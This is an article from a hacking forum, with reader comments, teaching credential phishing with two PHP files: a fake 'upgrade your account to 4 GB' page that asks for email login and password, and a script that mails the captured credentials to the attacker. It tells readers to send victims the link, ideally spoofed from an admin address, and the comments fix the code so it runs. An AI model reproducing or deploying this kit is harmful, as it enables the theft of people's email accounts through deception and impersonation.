Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Phishing - Email passwords via PHP

  1. Home
  2. Articles
  3. Social Engeneering
  4. Phishing - Email passwords via PHP

Phishing - Email passwords via PHP

By ghostghost | 13071 Reads |
0     0

Firstly, what is phishing? Phishing is the way to steal informations about person (credit card number, name or password to any service), by masquerading as a trustworthy person or business in an electronic communication. It is typically carried out using email or an instant messenger, we will use just e-mail. The way to do this is PHP. We create simple HTML form with PHP script, which send input data to our email. Now have a look on it:

What we need? server with PHP support fake mailer basic knowledge

How it works? There are two php files, one is form.php, second is perform.php . In form.php is form, which requires login and pass to e-mail. When user enter it and click on Submit, form.php sends input to perform.php, where is input sended to your e-mail. Simple, huh?

Sources:

form.php

<html>
<body>

<form action="perform.php" method="post">
<h1>Want more space?? Upgrade your account to 4 GB!!!</h1>
<b>Information about E-Mail Account:</b><br>
Login:  <input type="text" name="login" /><br>
<br>
Pass:  <input type="text" name="pass" /><br>
<br>
I want upgrade: <input type="checkbox"  disabled="yes" checked="yes" name="iwant" />
<input type="submit" value="Submit">
</form>

</body>
</html>

perform.php

<?php
$to = "your-email@provider.etc";
$subject = "Password of user $login";
$message = "Hello! Password of user $login is $pass";
$from = "something@something.etc";
$headers = "From: $from";
mail($to,$subject,$message,$headers);
echo "User $login successfully upgraded";
?>

Next step… Now change email in perform.php to your email and upload both files on server. Send to victim url to form.php with some nice comment… :D (for example: yourdomain.com/form.php), or, and this is better, send this from admin, or webmaster email (for example: admin@emailprovider.etc) for better effect (for this use fake mailer) ;) .

Thats all for now, friends!!

Comments
ghost's avatar
ghost 17 years ago

Excellent article :)

ghost's avatar
ghost 17 years ago

good job! went right to it. watch grammatical errors next time, besides that keep it up.

ghost's avatar
ghost 17 years ago

Great article, however you missed the $_POST stuff out from perform.php ;)

ghost's avatar
ghost 17 years ago

You wouldn't need it mastergamer… it's not writing to file. It's emailing directly and the mail headers look okay to me. Although I may end up standing corrected xD

ghost's avatar
ghost 17 years ago

he never defined $login and $pass

ghost's avatar
ghost 17 years ago

that is true unless he is using register_globals otherwise use

$login = $_POST['login'];
$pass = $_POST['pass'];

ghost's avatar
ghost 17 years ago

ugh use seperate lines tho, for some reason it didn't go on to different lines when i posted it

ghost's avatar
ghost 17 years ago

i like it!

ghost's avatar
ghost 17 years ago

thx all for comments :) this is my first article, so i will try write better next time… yeah i dont defined $login and $pass because i decided they are unnecessary. I tested it and it works fine ;)

Uber0n's avatar
Uber0n 17 years ago

Well done B)

bl4ckc4t's avatar
bl4ckc4t 17 years ago

yes, i was also going to say, you missed the _post stuff, but, you were already corrected by the others -Bl4ckc4t